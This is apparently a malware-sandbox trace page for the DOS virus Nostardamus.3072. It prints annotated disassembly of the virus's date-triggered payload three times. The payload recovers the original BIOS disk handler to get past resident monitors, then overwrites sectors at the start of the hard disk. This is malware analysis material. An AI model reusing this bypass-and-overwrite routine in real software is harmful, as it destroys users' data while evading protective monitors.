Sample viewer

vx.netlux.org/Virus.DOS.Nostardamus.3072.c


Syscalls:

Time Syscall Op Syscall Name
; Trace excerpt: instructions executed after the DOS "Get date" call (syscall 42 = INT 21h/AH=2Ah) returns.
; Shape: a date comparison, then (on a match) a raw BIOS disk write. The routine starts before and
; continues after this window, so the buffer source and any loop-back are not visible here.
2018-12-17T22:59:47.386779785Z 42 PC: 1300b | Get date 0x1300b: inc al    ; presumably AL = day of week from Get date (0 = Sunday); the call itself is outside the window
0x1300d: shl al, 1    ; AL = 2 * (day_of_week + 1)
0x1300f: cmp dl, al    ; DL is presumably still the day of month returned by Get date
0x13011: jne 0x13046    ; no match: skip the whole disk-write path
0x13013: mov ah, 0x13    ; INT 2Fh/AH=13h = DOS-internal "set disk interrupt handler"
0x13015: int 0x2f    ; swaps DS:DX (and ES:BX) with the INT 13h handler addresses DOS keeps internally; returns the previous ones
0x13017: push ds    ; keep the returned handler address (DS:DX) ...
0x13018: push dx    ; ... across the second call
0x13019: mov ah, 0x13    ; same function again, with the returned values still in DS:DX / ES:BX
0x1301b: int 0x2f    ; puts the DOS-internal pointers back as they were
0x1301d: pop dx    ; DS:DX = handler address obtained by the first call
0x1301e: pop ds
0x1301f: mov ax, 0x2513    ; AH=25h set interrupt vector, AL=13h (decimal 19, BIOS disk services)
0x13022: int 0x21    ; vector 13h now points at DS:DX, so later INT 13h calls skip handlers hooked after it (e.g. resident monitors)
0x13024: mov cx, 1    ; CH=0 cylinder 0, CL=1 sector 1
0x13027: mov dx, 0x580    ; DH=5 head 5, DL=80h first fixed disk
0x1302a: mov ax, 0x308    ; AH=03h write sectors, AL=8 sectors
0x1302d: int 0x13    ; BIOS write from ES:BX; the buffer setup is not shown in this excerpt
0x1302f: jb 0x1303e    ; carry set = BIOS reported an error: leave via 0x1303e
0x13031: dec dh    ; step to the next lower head; presumably repeated per head, loop-back not visible here

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13326,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Trace excerpt: instructions executed after the DOS "Get date" call (syscall 42 = INT 21h/AH=2Ah) returns.
; Shape: a date comparison, then (on a match) a raw BIOS disk write. The routine starts before and
; continues after this window, so the buffer source and any loop-back are not visible here.
2018-12-25T12:38:05.369106142Z 42 PC: 1300b | Get date 0x1300b: inc al    ; presumably AL = day of week from Get date (0 = Sunday); the call itself is outside the window
0x1300d: shl al, 1    ; AL = 2 * (day_of_week + 1)
0x1300f: cmp dl, al    ; DL is presumably still the day of month returned by Get date
0x13011: jne 0x13046    ; no match: skip the whole disk-write path
0x13013: mov ah, 0x13    ; INT 2Fh/AH=13h = DOS-internal "set disk interrupt handler"
0x13015: int 0x2f    ; swaps DS:DX (and ES:BX) with the INT 13h handler addresses DOS keeps internally; returns the previous ones
0x13017: push ds    ; keep the returned handler address (DS:DX) ...
0x13018: push dx    ; ... across the second call
0x13019: mov ah, 0x13    ; same function again, with the returned values still in DS:DX / ES:BX
0x1301b: int 0x2f    ; puts the DOS-internal pointers back as they were
0x1301d: pop dx    ; DS:DX = handler address obtained by the first call
0x1301e: pop ds
0x1301f: mov ax, 0x2513    ; AH=25h set interrupt vector, AL=13h (decimal 19, BIOS disk services)
0x13022: int 0x21    ; vector 13h now points at DS:DX, so later INT 13h calls skip handlers hooked after it (e.g. resident monitors)
0x13024: mov cx, 1    ; CH=0 cylinder 0, CL=1 sector 1
0x13027: mov dx, 0x580    ; DH=5 head 5, DL=80h first fixed disk
0x1302a: mov ax, 0x308    ; AH=03h write sectors, AL=8 sectors
0x1302d: int 0x13    ; BIOS write from ES:BX; the buffer setup is not shown in this excerpt
0x1302f: jb 0x1303e    ; carry set = BIOS reported an error: leave via 0x1303e
0x13031: dec dh    ; step to the next lower head; presumably repeated per head, loop-back not visible here

{"DateBased":true,"Day":10,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13326,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Trace excerpt: instructions executed after the DOS "Get date" call (syscall 42 = INT 21h/AH=2Ah) returns.
; Shape: a date comparison, then (on a match) a raw BIOS disk write. The routine starts before and
; continues after this window, so the buffer source and any loop-back are not visible here.
; In this trace the next logged call is "Set interrupt vector" at PC 13024, the return address of the
; int 0x21 at 0x13022, so the date comparison matched and the write path was entered.
2018-12-25T12:38:05.56956623Z 42 PC: 1300b | Get date 0x1300b: inc al    ; presumably AL = day of week from Get date (0 = Sunday); the call itself is outside the window
0x1300d: shl al, 1    ; AL = 2 * (day_of_week + 1)
0x1300f: cmp dl, al    ; DL is presumably still the day of month returned by Get date
0x13011: jne 0x13046    ; no match: skip the whole disk-write path
0x13013: mov ah, 0x13    ; INT 2Fh/AH=13h = DOS-internal "set disk interrupt handler"
0x13015: int 0x2f    ; swaps DS:DX (and ES:BX) with the INT 13h handler addresses DOS keeps internally; returns the previous ones
0x13017: push ds    ; keep the returned handler address (DS:DX) ...
0x13018: push dx    ; ... across the second call
0x13019: mov ah, 0x13    ; same function again, with the returned values still in DS:DX / ES:BX
0x1301b: int 0x2f    ; puts the DOS-internal pointers back as they were
0x1301d: pop dx    ; DS:DX = handler address obtained by the first call
0x1301e: pop ds
0x1301f: mov ax, 0x2513    ; AH=25h set interrupt vector, AL=13h (decimal 19, BIOS disk services - not the DOS "delete file" function)
0x13022: int 0x21    ; vector 13h now points at DS:DX, so later INT 13h calls skip handlers hooked after it (e.g. resident monitors)
0x13024: mov cx, 1    ; CH=0 cylinder 0, CL=1 sector 1
0x13027: mov dx, 0x580    ; DH=5 head 5, DL=80h first fixed disk
0x1302a: mov ax, 0x308    ; AH=03h write sectors, AL=8 sectors
0x1302d: int 0x13    ; BIOS write from ES:BX; the buffer setup is not shown in this excerpt
0x1302f: jb 0x1303e    ; carry set = BIOS reported an error: leave via 0x1303e
0x13031: dec dh    ; step to the next lower head; presumably repeated per head, loop-back not visible here
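2018-12-25T12:38:05.582118454Z 37 PC: 13024 | Set interrupt vector (Interrupt = '19' AKA 'Delete file') [note: vector 19 is 0x13, the BIOS disk-services interrupt; 'Delete file' is the name of DOS function 13h under INT 21h, not of this vector]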